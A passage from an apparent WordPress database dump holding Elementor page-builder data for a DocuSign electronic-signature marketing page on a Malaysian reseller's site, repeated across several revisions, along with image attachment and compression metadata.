alt=\\\"\\\" width=\\\"460\\\" height=\\\"144\\\" data-delta=\\\"3\\\" \\/><\\/h3><h3>The reliable, globally-trusted service for electronic signatures<\\/h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p><h2>\\u00a0<\\/h2><h3>Do more with the #1 eSignature platform for business<\\/h3><ul><li>Simple and fast setup gets you started immediately<\\/li><li>99.99% platform availability keeps your business running at all hours<\\/li><li>Flexible workflows to automate any agreement or approval process<\\/li><li>Rigorous security standards keep sensitive documents safe<\\/li><li>Instant visibility into document status and powerful reporting<\\/li><li>Full digital audit trail for easy compliance and legal enforceability<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><div><div><div><div class=\\\"row\\\"><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4752,2797,'_wp_page_template','template-fullwidth.php'),(4753,2797,'_elementor_edit_mode','builder'),(4754,2797,'_elementor_template_type','post'),(4755,2797,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign. Send. Success.<\\/h3><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your System of Agreement<\\/h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><p>\\u00a0<\\/p><h3>DocuSign makes your business run better<\\/h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/strong><br \\/>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong><br \\/>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f819e5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d2503c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9fdd6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4716,2790,'_wp_attached_file','2019/01/keybenefits-1.png'),(4717,2790,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:438;s:6:\"height\";i:212;s:4:\"file\";s:25:\"2019/01/keybenefits-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"keybenefits-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"keybenefits-1-300x145.png\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"keybenefits-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"keybenefits-1-20x10.png\";s:5:\"width\";i:20;s:6:\"height\";i:10;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4718,2790,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:27.530850444964290346661073272116482257843017578125;s:5:\"bytes\";i:22243;s:11:\"size_before\";i:80793;s:10:\"size_after\";i:58550;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:4403;s:11:\"size_before\";i:16325;s:10:\"size_after\";i:11922;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.530000000000001136868377216160297393798828125;s:5:\"bytes\";i:8429;s:11:\"size_before\";i:31777;s:10:\"size_after\";i:23348;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:9411;s:11:\"size_before\";i:32691;s:10:\"size_after\";i:23280;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4719,2791,'_wp_attached_file','2019/01/smb-keybenefits-2-2_07.png'),(4720,2791,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:392;s:6:\"height\";i:184;s:4:\"file\";s:34:\"2019/01/smb-keybenefits-2-2_07.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"smb-keybenefits-2-2_07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"smb-keybenefits-2-2_07-300x141.png\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"smb-keybenefits-2-2_07-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"smb-keybenefits-2-2_07-20x9.png\";s:5:\"width\";i:20;s:6:\"height\";i:9;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4721,2791,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.256945936565127652784212841652333736419677734375;s:5:\"bytes\";i:11046;s:11:\"size_before\";i:60503;s:10:\"size_after\";i:49457;s:4:\"time\";d:0.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2388;s:11:\"size_before\";i:11825;s:10:\"size_after\";i:9437;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:4215;s:11:\"size_before\";i:23112;s:10:\"size_after\";i:18897;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:4443;s:11:\"size_before\";i:25566;s:10:\"size_after\";i:21123;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}}}'),(4722,2792,'_wp_attached_file','2019/01/SMB.png'),(4723,2792,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:460;s:6:\"height\";i:144;s:4:\"file\";s:15:\"2019/01/SMB.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"SMB-150x144.png\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"SMB-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:15:\"SMB-300x144.png\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:12:\"SMB-20x6.png\";s:5:\"width\";i:20;s:6:\"height\";i:6;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4724,2792,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:28.237896289014503992120808106847107410430908203125;s:5:\"bytes\";i:6894;s:11:\"size_before\";i:24414;s:10:\"size_after\";i:17520;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.25999999999999801048033987171947956085205078125;s:5:\"bytes\";i:1692;s:11:\"size_before\";i:4541;s:10:\"size_after\";i:2849;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2570;s:11:\"size_before\";i:12200;s:10:\"size_after\";i:9630;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.2999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2632;s:11:\"size_before\";i:7673;s:10:\"size_after\";i:5041;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}}}'),(4730,2793,'_elementor_version','0.4'),(4745,2796,'_wp_page_template','template-fullwidth.php'),(4746,2796,'_elementor_edit_mode','builder'),(4747,2796,'_elementor_template_type','post'),(4748,2796,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign. Send. Success.<\\/h3><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your System of Agreement<\\/h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><p>\\u00a0<\\/p><h3>DocuSign makes your business run better<\\/h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/strong><br \\/>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong><br \\/>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e5b10e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b13789b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ae5fa4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f819e5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d2503c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9fdd6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4738,2795,'_wp_page_template','template-fullwidth.php'),(4739,2795,'_elementor_edit_mode','builder'),(4740,2795,'_elementor_template_type','post'),(4741,2795,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign. Send. Success.<\\/h3><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your System of Agreement<\\/h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s 